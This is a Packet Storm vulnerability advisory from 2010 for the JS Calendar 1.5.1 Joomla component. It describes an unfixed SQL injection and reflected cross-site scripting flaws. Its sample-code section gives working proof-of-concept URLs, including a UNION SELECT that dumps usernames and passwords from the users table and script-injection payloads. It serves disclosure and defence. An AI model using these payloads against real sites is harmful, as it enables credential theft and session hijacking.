Joomla JS Calendar 1.5.1 SQL Injection / Cross Site Scripting

2010-10-11T00:00:00
ID PACKETSTORM:94570
Type packetstorm
Reporter Salvatore Fresta
Modified 2010-10-11T00:00:00

Description

                                        
                                            `JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities  
  
Name JS Calendar  
Vendor http://www.joomlaseller.com  
Versions Affected 1.5.1  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2010-10-09  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
  
  
I. ABOUT THE APPLICATION  
________________________  
  
JoomlaSeller - Calendar Event is a powerful Joomla!  
component which allows you to easily create events and  
publish them on a desired date. It is a native build  
component for Joomla! 1.5 version and can easily be  
installed using the Joomla! back-end Install  
functionality.  
  
  
II. DESCRIPTION  
_______________  
  
Some parameters are not properly sanitised before being  
used in a SQL query or returned to the user.  
  
  
III. ANALYSIS  
_____________  
  
Summary:  
  
A) SQL Injection  
B) Multiple Reflected XSS  
  
  
A) SQL Injection  
________________  
  
Input passed to "ev_id" parameter is not properly  
sanitised before being used in SQL queries. This can be  
exploited to manipulate SQL queries by injecting  
arbitrary SQL code.  
  
  
B) Multiple XSS  
_______________  
  
Input passed to the "month" and "year" parameters are  
not properly sanitised before being returned to the  
user. This can be exploited to execute arbitrary HTML  
and script code in a users browser session in context  
of an affected site.  
  
  
IV. SAMPLE CODE  
_______________  
  
A) SQL Injection  
  
http://site/path/index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users  
  
  
B) Multiple XSS  
  
http://site/path/index.php?option=com_jscalendar&view=jscalendar&month=<script>alert('XSS');</script>  
  
http://site/path/index.php?option=com_jscalendar&view=jscalendar&year=<script>alert('XSS');</script>  
  
  
V. FIX  
______  
  
No fix.  
  
  
`